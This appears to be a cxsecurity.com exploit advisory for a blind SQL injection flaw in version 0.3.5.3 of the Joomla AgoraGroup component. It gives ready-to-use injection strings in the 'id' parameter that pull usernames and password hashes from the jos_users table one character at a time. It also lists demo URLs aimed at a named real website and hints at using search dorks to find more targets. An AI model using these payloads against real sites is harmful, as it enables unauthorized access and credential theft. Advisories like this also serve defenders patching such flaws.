Joomla Component AgoraGroup 0.3.5.3 Blind SQL Injection Vulnerability

2009.06.02
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_agoragroup (id) Blind SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Greetz : d4n!ux x_jeshua + eCORE + Painboy + rayok3nt & N03! [+] Vulnerability : Blind SQL injection [+] Google Dork : imagine ;) -------------------------------------------------- author : Russell... author Email : chipdebios@gmail.com ################################################### Example: http://localHost/path/index.php?option=com_agoragroup&con=groupdetail&id=2[SQL code] SQL code: and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 DEMO: http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1 http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1 http://notaryzip.com/index.php?option=com_agoragroup&con=groupdetail&id=2+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=72 etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <name>AgoraGroup</name> <version>0.3.5.3</version> <description>AgoraGroups- Groups component for Agora Forum v.3+</description> <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license> <author>The JoomlaMe team</author> <authoremail>info@easy-joomla.org</authoremail> <authorurl>http://www.easy-joomla.org</authorurl>

References:

http://www.securityfocus.com/bid/35118
http://www.milw0rm.com/exploits/8814


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top